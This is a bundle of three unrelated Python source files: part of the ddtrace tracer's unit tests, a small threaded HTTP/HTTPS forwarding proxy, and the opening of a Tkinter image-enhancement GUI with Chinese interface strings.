t = ddtrace.Tracer(dogstatsd_url="unix:///var/run/statsd.sock")
assert t.writer.dogstatsd.socket_path == "/var/run/statsd.sock"
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(dogstatsd_url="foo://foobar:12")
assert str(e) == "Unknown url format for `foo://foobar:12`"
def test_tracer_fork():
t = ddtrace.Tracer()
original_pid = t._pid
original_writer = t.writer
@contextlib.contextmanager
def capture_failures(errors):
try:
yield
except AssertionError as e:
errors.put(e)
def task(t, errors):
# Start a new span to trigger process checking
with t.trace("test", service="test"):
# Assert we recreated the writer and have a new queue
with capture_failures(errors):
assert t._pid != original_pid
assert t.writer is not original_writer
assert t.writer._buffer is not original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 0
assert len(t.writer._buffer) == 1
# Assert tracer in a new process correctly recreates the writer
errors = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(t, errors))
try:
p.start()
finally:
p.join(timeout=2)
assert errors.empty(), errors.get()
# Ensure writing into the tracer in this process still works as expected
with t.trace("test", service="test"):
assert t._pid == original_pid
assert t.writer == original_writer
assert t.writer._buffer == original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 1
assert len(t.writer._buffer) == 1
def test_tracer_with_version():
t = ddtrace.Tracer()
# With global `config.version` defined
with override_global_config(dict(version="1.2.3")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "1.2.3"
# override manually
span.set_tag(VERSION_KEY, "4.5.6")
assert span.get_tag(VERSION_KEY) == "4.5.6"
# With no `config.version` defined
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) is None
# explicitly set in the span
span.set_tag(VERSION_KEY, "1.2.3")
assert span.get_tag(VERSION_KEY) == "1.2.3"
# With global tags set
t.set_tags({VERSION_KEY: "tags.version"})
with override_global_config(dict(version="config.version")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "config.version"
def test_tracer_with_env():
t = ddtrace.Tracer()
# With global `config.env` defined
with override_global_config(dict(env="prod")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "prod"
# override manually
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With no `config.env` defined
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) is None
# explicitly set in the span
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With global tags set
t.set_tags({ENV_KEY: "tags.env"})
with override_global_config(dict(env="config.env")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "config.env"
class EnvTracerTestCase(TracerTestCase):
"""Tracer test cases requiring environment variables."""
@run_in_subprocess(env_overrides=dict(DATADOG_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DATADOG_SERVICE_NAME(self):
"""
When DATADOG_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DD_SERVICE_NAME(self):
"""
When DD_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env(self):
with self.start_span("") as span:
pass
span.assert_matches(
service="mysvc",
)
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env_global_config(self):
# Global config should have higher precedence than the environment variable
with self.override_global_config(dict(service="overridesvc")):
with self.start_span("") as span:
pass
span.assert_matches(
service="overridesvc",
)
@run_in_subprocess(env_overrides=dict(DD_VERSION="0.1.2"))
def test_version_no_global_service(self):
# Version should be set if no service name is present
with self.trace("") as span:
span.assert_matches(
meta={
VERSION_KEY: "0.1.2",
},
)
# The version will not be tagged if the service is not globally
# configured.
with self.trace("root", service="rootsvc") as root:
assert VERSION_KEY not in root.meta
with self.trace("child") as span:
assert VERSION_KEY not in span.meta
@run_in_subprocess(env_overrides=dict(DD_SERVICE="django", DD_VERSION="0.1.2"))
def test_version_service(self):
# Fleshed out example of service and version tagging
# Our app is called django, we provide DD_SERVICE=django and DD_VERSION=0.1.2
with self.trace("django.request") as root:
# Root span should be tagged
assert root.service == "django"
assert VERSION_KEY in root.meta and root.meta[VERSION_KEY] == "0.1.2"
# Child spans should be tagged
with self.trace("") as child1:
assert child1.service == "django"
assert VERSION_KEY in child1.meta and child1.meta[VERSION_KEY] == "0.1.2"
# Version should not be applied to spans of a service that isn't user-defined
with self.trace("mysql.query", service="mysql") as span:
assert VERSION_KEY not in span.meta
# Child should also not have a version
with self.trace("") as child2:
assert child2.service == "mysql"
assert VERSION_KEY not in child2.meta
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agentless_env_with_lambda(self):
assert _in_aws_lambda()
assert not _has_aws_lambda_agent_extension()
tracer = Tracer()
assert isinstance(tracer.writer, LogWriter)
tracer.configure(enabled=True)
assert isinstance(tracer.writer, LogWriter)
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agent_config_with_lambda_extension(self):
def mock_os_path_exists(path):
return path == "/opt/extensions/datadog-agent"
assert _in_aws_lambda()
with mock.patch("os.path.exists", side_effect=mock_os_path_exists):
assert _has_aws_lambda_agent_extension()
tracer = Tracer()
assert isinstance(tracer.writer, AgentWriter)
assert tracer.writer._sync_mode
tracer.configure(enabled=False)
assert isinstance(tracer.writer, AgentWriter)
assert tracer.writer._sync_mode
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func", DD_AGENT_HOST="localhost"))
def test_detect_agent_config(self):
tracer = Tracer()
assert isinstance(tracer.writer, AgentWriter)
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2"))
def test_dd_tags(self):
assert self.tracer.tags["key1"] == "value1"
assert self.tracer.tags["key2"] == "value2"
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2,key3"))
def test_dd_tags_invalid(self):
assert "key1" in self.tracer.tags
assert "key2" in self.tracer.tags
assert "key3" not in self.tracer.tags
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "mysvc"
assert s.get_tag("env") == "myenv"
assert s.get_tag("version") == "myvers"
@run_in_subprocess(
env_overrides=dict(
DD_TAGS="service:s,env:e,version:v",
DD_ENV="env",
DD_SERVICE="svc",
DD_VERSION="0.123",
)
)
def test_tags_from_DD_TAGS_precedence(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "svc"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS_override(self):
t = ddtrace.Tracer()
ddtrace.config.env = "env"
ddtrace.config.service = "service"
ddtrace.config.version = "0.123"
with t.trace("test") as s:
assert s.service == "service"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
def test_tracer_set_runtime_tags():
t = ddtrace.Tracer()
with t.start_span("foobar") as span:
pass
assert len(span.get_tag("runtime-id"))
t2 = ddtrace.Tracer()
with t2.start_span("foobaz") as span2:
pass
assert span.get_tag("runtime-id") == span2.get_tag("runtime-id")
def test_tracer_runtime_tags_fork():
tracer = ddtrace.Tracer()
def task(tracer, q):
span = tracer.start_span("foobaz")
q.put(span.get_tag("runtime-id"))
span.finish()
span = tracer.start_span("foobar")
span.finish()
q = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children_tag = q.get()
assert children_tag != span.get_tag("runtime-id")
def test_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
span = t.start_span("hello")
assert span == result["span"]
span.finish()
def test_deregister_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
t.deregister_on_start_span(store_span)
with t.start_span("hello"):
pass
assert result == {}
def test_enable(monkeypatch):
t1 = ddtrace.Tracer()
assert t1.enabled
monkeypatch.setenv("DD_TRACE_ENABLED", "false")
t2 = ddtrace.Tracer()
assert not t2.enabled
def test_runtime_id_parent_only():
tracer = ddtrace.Tracer()
# Parent spans should have runtime-id
s = tracer.trace("test")
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
# Child spans should not
s2 = tracer.trace("test2")
assert s2.get_tag("runtime-id") is None
s2.finish()
s.finish()
# Parent spans should have runtime-id
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
def test_runtime_id_fork():
tracer = ddtrace.Tracer()
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
pid = os.fork()
if pid == 0:
# child
s = tracer.trace("test")
s.finish()
rtid_child = s.get_tag("runtime-id")
assert isinstance(rtid_child, six.string_types)
assert rtid != rtid_child
os._exit(12)
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_multiple_tracer_ctx():
t1 = ddtrace.Tracer()
t2 = ddtrace.Tracer()
with t1.trace("") as s1:
with t2.trace("") as s2:
pass
assert s2.parent_id == s1.span_id
assert s2.trace_id == s1.trace_id
def test_filters(tracer, test_spans):
class FilterAll(object):
def process_trace(self, trace):
return None
tracer.configure(
settings={
"FILTERS": [FilterAll()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 0
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
s1, s2 = spans
assert s1.get_tag("boop") == "beep"
assert s2.get_tag("boop") == "beep"
# Test multiple filters
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterMutate("mats", "sundin")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
assert s.get_tag("mats") == "sundin"
class FilterBroken(object):
def process_trace(self, trace):
_ = 1 / 0
tracer.configure(
settings={
"FILTERS": [FilterBroken()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterBroken()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
def test_early_exit(tracer, test_spans):
s1 = tracer.trace("1")
s2 = tracer.trace("2")
s1.finish()
tracer.log = mock.MagicMock(wraps=tracer.log)
s2.finish()
calls = [
mock.call("span %r closing after its parent %r, this is an error when not using async", s2, s1),
]
tracer.log.debug.assert_has_calls(calls)
assert s1.parent_id is None
assert s2.parent_id is s1.span_id
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
s1 = tracer.trace("1-1")
s1.finish()
assert s1.parent_id is None
s1 = tracer.trace("1-2")
s1.finish()
assert s1.parent_id is None
class TestPartialFlush(TracerTestCase):
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="5")
)
def test_partial_flush(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 5
assert [s.name for s in traces[0]] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="1")
)
def test_partial_flush_too_many(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 5
for t in traces:
assert len(t) == 1
assert [t[0].name for t in traces] == ["child0", "child1", "child2", "child3", "child4"]
for t in traces:
assert t[0].parent_id == root.span_id
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_too_few(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 0
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert [s.name for s in traces[0]] == ["root", "child0", "child1", "child2", "child3", "child4"]
def test_partial_flush_configure(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=5)
self.test_partial_flush()
def test_partial_flush_too_many_configure(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=1)
self.test_partial_flush_too_many()
def test_partial_flush_too_few_configure(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=6)
self.test_partial_flush_too_few()
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="false", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_configure_precedence(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=5)
self.test_partial_flush()
def test_unicode_config_vals():
t = ddtrace.Tracer()
with override_global_config(dict(version=u"😇", env=u"😇")):
with t.trace("1"):
pass
t.shutdown()
def test_ctx(tracer, test_spans):
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s1.span_id
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s2.span_id
with tracer.trace("test3") as s3:
assert tracer.current_span() == s3
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s3.span_id
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s2.span_id
with tracer.trace("test4") as s4:
assert tracer.current_span() == s4
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s4.span_id
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert s1.parent_id is None
assert s2.parent_id == s1.span_id
assert s3.parent_id == s2.span_id
assert s4.parent_id == s1.span_id
assert s1.trace_id == s2.trace_id == s3.trace_id == s4.trace_id
assert s1.metrics[SAMPLING_PRIORITY_KEY] == 1
assert SAMPLING_PRIORITY_KEY not in s2.metrics
assert ORIGIN_KEY not in s1.meta
t = test_spans.pop_traces()
assert len(t) == 1
assert len(t[0]) == 4
_s1, _s2, _s3, _s4 = t[0]
assert s1 == _s1
assert s2 == _s2
assert s3 == _s3
assert s4 == _s4
with tracer.trace("s") as s:
assert s.parent_id is None
assert s.trace_id != s1.trace_id
def test_multithreaded(tracer, test_spans):
def target():
with tracer.trace("s1"):
with tracer.trace("s2"):
pass
with tracer.trace("s3"):
pass
for i in range(1000):
ts = [threading.Thread(target=target) for _ in range(10)]
for t in ts:
t.start()
for t in ts:
t.join()
traces = test_spans.pop_traces()
assert len(traces) == 10
for trace in traces:
assert len(trace) == 3
def test_ctx_distributed(tracer, test_spans):
# Test activating an invalid context.
ctx = Context(span_id=None, trace_id=None)
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s1.span_id
assert s1.parent_id is None
trace = test_spans.pop_traces()
assert len(trace) == 1
# Test activating a valid context.
ctx = Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
assert (
tracer.current_trace_context()
== tracer.context_provider.active()
== Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
)
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s2
assert tracer.current_trace_context().trace_id == s2.trace_id == 4321
assert tracer.current_trace_context().span_id == s2.span_id
assert s2.parent_id == 1234
trace = test_spans.pop_traces()
assert len(trace) == 1
assert s2.metrics[SAMPLING_PRIORITY_KEY] == 2
assert s2.meta[ORIGIN_KEY] == "somewhere"
def test_manual_keep(tracer, test_spans):
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
def test_manual_keep_then_drop(tracer, test_spans):
# Test changing the value before finish.
with tracer.trace("asdf") as root:
with tracer.trace("child") as child:
child.set_tag(MANUAL_KEEP_KEY)
root.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
def test_manual_drop(tracer, test_spans):
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_enabled(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=True)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) == "test-hostname"
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_disabled(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_default(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
def test_non_active_span(tracer, test_spans):
with tracer.start_span("test", activate=False):
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert tracer.current_span() is None
assert tracer.current_root_span() is None
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
with tracer.start_span("test1", activate=False):
with tracer.start_span("test2", activate=False):
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert tracer.current_span() is None
assert tracer.current_root_span() is None
traces = test_spans.pop_traces()
assert len(traces) == 2
with tracer.start_span("active", activate=True) as active:
with tracer.start_span("non active", child_of=active, activate=False):
assert tracer.context_provider.active() is active
assert tracer.current_root_span() is active
assert tracer.context_provider.active() is active
assert tracer.current_root_span() is active
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
def test_service_mapping():
@contextlib.contextmanager
def override_service_mapping(service_mapping):
with override_env(dict(DD_SERVICE_MAPPING=service_mapping)):
assert ddtrace.config.service_mapping == {}
ddtrace.config.service_mapping = Config().service_mapping
yield
ddtrace.config.service_mapping = {}
# Test single mapping
with override_service_mapping("foo:bar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "bar"
# Test multiple mappings
with override_service_mapping("foo:bar,sna:fu"), ddtrace.Tracer().trace("renaming", service="sna") as span:
assert span.service == "fu"
# Test colliding mappings
with override_service_mapping("foo:bar,foo:foobar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "foobar"
# Test invalid service mapping
with override_service_mapping("foo;bar,sna:fu"):
with ddtrace.Tracer().trace("passthru", service="foo") as _:
assert _.service == "foo"
with ddtrace.Tracer().trace("renaming", "sna") as _:
assert _.service == "fu"
def test_configure_url_partial():
tracer = ddtrace.Tracer()
tracer.configure(hostname="abc")
assert tracer.writer.agent_url == "http://abc:8126"
tracer.configure(port=123)
assert tracer.writer.agent_url == "http://abc:123"
tracer = ddtrace.Tracer(url="http://abc")
assert tracer.writer.agent_url == "http://abc"
tracer.configure(port=123)
assert tracer.writer.agent_url == "http://abc:123"
tracer.configure(port=431)
assert tracer.writer.agent_url == "http://abc:431"
def test_bad_agent_url(monkeypatch):
with pytest.raises(ValueError):
Tracer(url="bad://localhost:8126")
monkeypatch.setenv("DD_TRACE_AGENT_URL", "bad://localhost:1234")
with pytest.raises(ValueError) as e:
Tracer()
assert (
str(e.value)
== "Unsupported protocol 'bad' in Agent URL 'bad://localhost:1234'. Must be one of: http, https, unix"
)
monkeypatch.setenv("DD_TRACE_AGENT_URL", "unix://")
with pytest.raises(ValueError) as e:
Tracer()
assert str(e.value) == "Invalid file path in Agent URL 'unix://'"
monkeypatch.setenv("DD_TRACE_AGENT_URL", "http://")
with pytest.raises(ValueError) as e:
Tracer()
assert str(e.value) == "Invalid hostname in Agent URL 'http://'"
def test_context_priority(tracer, test_spans):
"""Assigning a sampling_priority should not affect if the trace is sent to the agent"""
for p in [priority.USER_REJECT, priority.AUTO_REJECT, priority.AUTO_KEEP, priority.USER_KEEP, None, 999]:
with tracer.trace("span_%s" % p) as span:
span.context.sampling_priority = p
# Spans should always be written regardless of sampling priority since
# the agent needs to know the sampling decision.
spans = test_spans.pop()
assert len(spans) == 1, "trace should be sampled"
if p in [priority.USER_REJECT, priority.AUTO_REJECT, priority.AUTO_KEEP, priority.USER_KEEP]:
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] == p
def test_spans_sampled_out(tracer, test_spans):
with tracer.trace("root") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = False
spans = test_spans.pop()
assert len(spans) == 0
def test_spans_sampled_one(tracer, test_spans):
with tracer.trace("root") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = True
spans = test_spans.pop()
assert len(spans) == 3
def test_spans_sampled_all(tracer, test_spans):
with tracer.trace("root") as span:
span.sampled = True
with tracer.trace("child") as span:
span.sampled = True
with tracer.trace("child") as span:
span.sampled = True
spans = test_spans.pop()
assert len(spans) == 3
def test_closing_other_context_spans_single_span(tracer, test_spans):
"""
Ensure that a span created in one thread can be finished in another without
breaking the active span management.
"""
def _target(span):
assert tracer.current_span() is None
span.finish()
assert tracer.current_span() is None
span = tracer.trace("main thread")
assert tracer.current_span() is span
t1 = threading.Thread(target=_target, args=(span,))
t1.start()
t1.join()
assert tracer.current_span() is None
spans = test_spans.pop()
assert len(spans) == 1
def test_closing_other_context_spans_multi_spans(tracer, test_spans):
"""
Ensure that spans created in one thread can be finished in another without
breaking the active span management.
"""
def _target(span):
assert tracer.current_span() is None
span.finish()
assert tracer.current_span() is None
root = tracer.trace("root span")
span = tracer.trace("child span")
assert tracer.current_span() is span
t1 = threading.Thread(target=_target, args=(span,))
t1.start()
t1.join()
assert tracer.current_span() is root
root.finish()
spans = test_spans.pop()
assert len(spans) == 2
def test_fork_manual_span_same_context(tracer):
span = tracer.trace("test")
pid = os.fork()
if pid == 0:
child = tracer.start_span("child", child_of=span)
assert child.parent_id == span.span_id
assert child._parent is None
# No more current span strong reference to avoid memory leaks.
assert tracer.current_span() is None
child.finish()
os._exit(12)
span.finish()
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_fork_manual_span_different_contexts(tracer):
span = tracer.start_span("test")
pid = os.fork()
if pid == 0:
child = tracer.start_span("child", child_of=span)
assert child.parent_id == span.span_id
assert child._parent is None
assert tracer.current_span() is None
child.finish()
os._exit(12)
span.finish()
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
|
ProxyServer.py
|
import socket
from threading import Thread
from RequestParser import RequestParser
CONNECTION_RESPONSE = "HTTP/1.0 200 Connection established\r\n\r\n"
class ProxyServer:
def __init__(self):
self.listening_socket = None
self.buf_length = 8192
def run_server(self, ip="0.0.0.0", port=5000):
self.listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listening_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
self.listening_socket.bind((ip, port))
except socket.error:
print("Unable to bind socket on {}:{}".format(ip, port))
self.listening_socket.close()
exit(2)
self.listening_socket.listen(20)
print(f"Listening on {ip}:{port}")
while True:
client, addr = self.listening_socket.accept()
print(f"Accept connection from {addr[0]}:{addr[1]}")
Thread(target=self.handle_request, args=(client,)).start()
def handle_request(self, client):
data_from_client = client.recv(self.buf_length)
request = RequestParser.parse_request(data_from_client)
self.choose_messaging_handler(request, client)
def choose_messaging_handler(self, request, client):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server_socket.connect((request["host"], request["port"]))
except socket.error:
print(f'Could not connect to {request["host"]}:{request["port"]}')
client.close()
server_socket.close()
return
if "CONNECT" in request["meta"]:
self.run_https_messaging(request, client, server_socket)
else:
self.run_http_handle(request, client, server_socket)
def run_http_handle(self, request, client, server_socket):
server_socket.sendall(request["orig_data"])
while True:
response = server_socket.recv(self.buf_length)
if not response:
break
client.sendall(response)
server_socket.close()
client.close()
def run_https_messaging(self, request, client, server_socket):
client.sendall(CONNECTION_RESPONSE.encode())
client.setblocking(False)
server_socket.setblocking(False)
# Forwarding messages from client to server and vice-versa
while True:
try:
data = client.recv(self.buf_length)
if not data:
print("Data from client is empty (In connection with {}:{})"
.format(request["host"], request["port"]))
break
server_socket.sendall(data)
except socket.error:
pass
try:
response = server_socket.recv(self.buf_length)
if not response:
print("Data from server is empty (Address: {}:{})"
.format(request["host"], request["port"]))
break
client.sendall(response)
except socket.error:
pass
server_socket.close()
client.close()
|
app.py
|
#!/usr/bin/env python3
import sys
import cv2
import glob
import logging
import numpy as np
import tkinter as tk
import tkinter.messagebox as pop_msg
import os
from tkinter import ttk
import tkinter.filedialog as filedialog
from PIL import Image, ImageTk
import threading as td
import subprocess
from threading import RLock
from PIL.ImageTk import PhotoImage
from enhancer import Enhancer
# Uncomment the following line if u wanna run it on CPU.
# os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
class APP(tk.Tk):
def __init__(self):
super().__init__(className='fantasticFilter')
''' ========== Locks ========== '''
self.resize_lock = td.Lock()
self.resizing = False
''' ======= Tk widgets ======== '''
self.style = ttk.Style()
self.frame_main_left = None
self.frame_main_center = None
self.frame_main_right = None
self.show_origin_btn = None
self.show_enhanced_btn = None
self.canvas: ResizingCanvas = None
self.enhance_pb = None
self.start_enhance_btn = None
self.input_resize_height = None
self.input_resize_width = None
''' ========= Tk flags ======== '''
self._model_path_obj = tk.StringVar(self)
self.main_right_model_label = tk.StringVar(self)
self.main_right_model_label.set("使用模型:<無>")
self._vignette_scale = 1
self._vignette_should_update = False
self._vignette_lock = RLock()
''' ======== neuronal ========= '''
self._model = Enhancer()
''' ===== internal flags ====== '''
self._model_loaded = self._model.model_available
self._image_loaded = lambda: self._main_image_origin is not None
self.status_text = tk.StringVar(self)
self.resize_width = tk.StringVar(self)
self.resize_width.trace("w", self._resize_width_listener)
self.resize_height = tk.StringVar(self)
self.resize_height.trace("w", self._resize_height_listener)
self.status_text.set("就緒")
''' ===== np array images ===== '''
self._main_image_origin = None
self._main_image_current_clean = None
self._main_image_enhanced = None
''' ========== theme ========== '''
try:
from ttkthemes import ThemedStyle
style = ThemedStyle(self)
style.set_theme("arc")
except ImportError as e:
class ThemedStyle:
pass
''' ====== configuration ====== '''
self.model_dir = resource_path("pretrained/")
self.vignette_handler()
def _show_origin_listener(self, *args):
if not (self._check_image()): return
image = Image.fromarray(np.asarray(self._main_image_origin))
self.canvas.set_main_image(image)
self.show_origin_btn.config(state="disabled")
self.show_enhanced_btn.config(state="normal")
def _show_enhanced_listener(self, *args):
if not (self._check_image()): return
if self._main_image_enhanced is None:
pop_msg.showinfo("Umm...", "請先增強圖片")
return
image = Image.fromarray(np.asarray(self._main_image_enhanced))
self.canvas.set_main_image(image)
self.canvas.request_update()
self.show_enhanced_btn.config(state="disabled")
